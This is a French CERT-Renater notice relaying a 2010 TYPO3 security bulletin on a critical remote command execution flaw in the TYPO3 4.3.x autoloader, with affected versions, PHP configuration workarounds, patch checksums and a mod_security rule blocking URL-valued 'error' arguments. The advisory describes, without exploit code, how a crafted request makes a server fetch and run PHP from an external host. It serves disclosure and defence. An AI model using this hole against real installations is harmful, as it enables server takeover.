=====================================================================
                                   CERT-Renater

                        Note d'Information No. 2010/VULN120
_____________________________________________________________________

DATE                      : 09/04/2010

HARDWARE PLATFORM(S)      : /

OPERATING SYSTEM(S)       : Systems running TYPO3 Core versions 4.3.0, 4.3.1, 4.3.2.

======================================================================
http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-008/
______________________________________________________________________

TYPO3 Security Bulletin TYPO3-SA-2010-008: Remote Command Execution in TYPO3 Core

Component Type: TYPO3 Core

Affected Versions: 4.3.0, 4.3.1 and 4.3.2 (+ development releases of 4.4 branch)

Vulnerability Types: Remote Command Execution

Overall Severity: Critical

Release Date: April 9, 2010





Vulnerable subcomponent: TYPO3 autoloader

Vulnerability Type: Remote Command Execution

Severity: Critical

Suggested CVSS v2.0: AV:N/AC:H/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C (What's that?)

Problem Description: The TYPO3 autoloader does not validate passed arguments.

You are not vulnerable if at least one of following conditions is met:

You are using any other TYPO3 version than 4.3.0, 4.3.1 or 4.3.2 (+ development
releases of 4.4 branch).
You have at least one of following PHP configuration variables set to "off":
register_globals ("off" by default, advised to be "off" in TYPO3 Security Cookbook),
allow_url_include ("off" by default) and allow_url_fopen ("on" by default)
You are using Suhosin and haven't put URL schemes in configuration variable
"suhosin.executor.include.whitelist".
Possible Impact: A crafted request to a vulnerable TYPO3 installation will
allow an attacker to load PHP code from an external server and to execute it
on the TYPO3 installation.

Solution: You can choose one of the solutions below:

Update to the TYPO3 version 4.3.3 that fix the problem described!
Set at least one of following PHP configuration variables to "off":
register_globals, allow_url_include and allow_url_fopen
Apply the patch that is linked below!
Replace all files that are part of the security fix by using the zip archive
that is linked below!
Set up a mod_security rule:
SecRule  ARGS:error  "^(https?|ftp)"  "deny"
Patch: how to patch

Patch for TYPO3 version 4.3.x (md5 sum: 19fec0afa12e91152811d9c6e9c73cf1)
Files: Extract the archive and replace server files with those that are in the archive

Archive containing safe to use files (md5 sum: fb5e62007c20f8a03b06d1acab1f4c8e)
Note: We have been informed that this vulnerability has already been exploited.

Credits: Credits go to Christian Bülter and Bastian Heiser who discovered and reported
the issue and the Security Team members Dmitry Dulepov, Marcus Krause and Helmut Hummel
for providing the mod_security rule and the patch.



General Advice: Follow the recommendations that are given in the TYPO3 Security
Cookbook. Please subscribe to the typo3-announce mailing list.
======================================================================

          =========================================================
          Les serveurs de référence du CERT-Renater
          http://www.urec.fr/securite
          http://www.cru.fr/securite
          http://www.renater.fr
          =========================================================
          + CERT-RENATER          | tel : 01-53-94-20-44          +
          + 151 bd de l'Hopital   | fax : 01-53-94-20-41          +
          + 75013 Paris           | email: certsvp@renater.fr     +
          =========================================================